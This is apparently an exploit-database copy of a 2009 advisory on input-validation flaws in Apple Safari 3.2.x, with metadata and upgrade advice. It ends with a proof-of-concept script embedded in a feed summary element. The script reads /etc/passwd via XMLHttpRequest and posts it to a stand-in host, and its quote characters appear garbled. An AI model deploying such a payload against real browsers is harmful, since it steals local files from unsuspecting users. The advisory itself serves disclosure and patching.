header-logo
Suggest Exploit
vendor:
Safari
by:
SecurityFocus
7.5
CVSS
HIGH
Multiple Input-Validation Vulnerabilities
20
CWE
Product Name: Safari
Affected Version From: Safari 3.2.2
Affected Version To: Safari 3.2.3
Patch Exists: YES
Related CWE: N/A
CPE: apple:safari
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Apple Safari Multiple Input-Validation Vulnerabilities

An attacker can exploit these issues by enticing an unsuspecting victim to visit a malicious website. Successfully exploiting these issues will allow the attacker to execute arbitrary JavaScript code in the local security zone. This may allow the attacker to obtain sensitive information that can aid in further attacks; other consequences may also occur.

Mitigation:

Upgrade to the latest version of Safari
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/34925/info

Apple Safari is prone to multiple input-validation vulnerabilities.

An attacker can exploit these issues by enticing an unsuspecting victim to visit a malicious website.

Successfully exploiting these issues will allow the attacker to execute arbitrary JavaScript code in the local security zone. This may allow the attacker to obtain sensitive information that can aid in further attacks; other consequences may also occur.

These issues affect versions prior to Safari 3.2.3. 

<summary>On the Cylon baseship, Cavil confronts the last member of the Final Five.
<script>
var contents;
var req;
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open(�GET�, �file:///etc/passwd�, true);
req.send(�);

function processReqChange() {
if (req.readyState == 4) {
contents = req.responseText;
sendit2XSSniper(contents);
}
}
function sendit2XSSniper(stuff){
var req2;
req2 = new XMLHttpRequest();
req2.open(�POST�, �http://www.example.com�, true);
req2.setRequestHeader(�Content-Type�,'application/x-www-form-urlencoded�);
req2.send(�filename=etcpasswd&filecontents=�+escape(stuff));
}
</script>
</summary>